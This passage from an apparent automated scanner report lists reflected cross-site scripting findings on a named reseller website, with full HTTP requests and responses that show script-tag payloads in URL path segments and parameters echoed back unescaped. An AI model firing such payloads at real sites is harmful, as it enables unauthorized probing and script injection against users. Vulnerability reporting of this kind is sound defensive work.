Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail23f42<script>alert(1)</script>4553f9da45c/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2130. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6380<script>alert(1)</script>75940babdf9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30b6380<script>alert(1)</script>75940babdf9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30b6380<script>alert(1)</script>75940babdf9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2131. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67c00<script>alert(1)</script>218a5fddf41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes67c00<script>alert(1)</script>218a5fddf41/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes67c00<script>alert(1)</script>218a5fddf41/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2132. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 610a2<script>alert(1)</script>2ee75bc4ac9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos610a2<script>alert(1)</script>2ee75bc4ac9/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos610a2<script>alert(1)</script>2ee75bc4ac9/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2133. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ffcc5<script>alert(1)</script>58ceb62740c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesffcc5<script>alert(1)</script>58ceb62740c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesffcc5<script>alert(1)</script>58ceb62740c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2134. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8926c<script>alert(1)</script>2597938f910 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating8926c<script>alert(1)</script>2597938f910/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating8926c<script>alert(1)</script>2597938f910/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2135. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 44fb1<script>alert(1)</script>6723b762042 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/search.php44fb1<script>alert(1)</script>6723b762042?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php44fb1<script>alert(1)</script>6723b762042?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2136. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 312a1<a>0c5940fca50 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search312a1<a>0c5940fca50&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search312a1<a>0c5940fca50&opt=2 was not found on this server.</p>
...[SNIP]...

2.2137. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f535b<a>765a309f3a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...f535b<a>765a309f3a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...f535b<a>765a309f3a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2138. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1fd9f<script>alert(1)</script>e07ebc70d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1fd9f<script>alert(1)</script>e07ebc70d1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1fd9f<script>alert(1)</script>e07ebc70d1b=1 was not found on this server.</p>
...[SNIP]...

2.2139. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 115f5<a>c5ad1e63ea2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2115f5<a>c5ad1e63ea2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2115f5<a>c5ad1e63ea2 was not found on this server.</p>
...[SNIP]...

2.2140. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f8d8<script>alert(1)</script>d2934478a69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f8d8<script>alert(1)</script>d2934478a69/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f8d8<script>alert(1)</script>d2934478a69/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2141. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf13e<script>alert(1)</script>eb8a714ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30cf13e<script>alert(1)</script>eb8a714ed4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30cf13e<script>alert(1)</script>eb8a714ed4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2142. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 339c1<script>alert(1)</script>12e12520c05 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes339c1<script>alert(1)</script>12e12520c05/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes339c1<script>alert(1)</script>12e12520c05/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2143. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 835a9<script>alert(1)</script>811308548d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos835a9<script>alert(1)</script>811308548d9/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos835a9<script>alert(1)</script>811308548d9/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2144. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 67e73<script>alert(1)</script>164be6f55b3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images67e73<script>alert(1)</script>164be6f55b3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images67e73<script>alert(1)</script>164be6f55b3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2145. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1c114<script>alert(1)</script>179f0e594f8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/search.php1c114<script>alert(1)</script>179f0e594f8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php1c114<script>alert(1)</script>179f0e594f8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2146. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3cc50<a>a9a79763188 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3cc50<a>a9a79763188&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3cc50<a>a9a79763188&opt=2 was not found on this server.</p>
...[SNIP]...

2.2147. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload dd39a<a>26ec7ce5e9b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

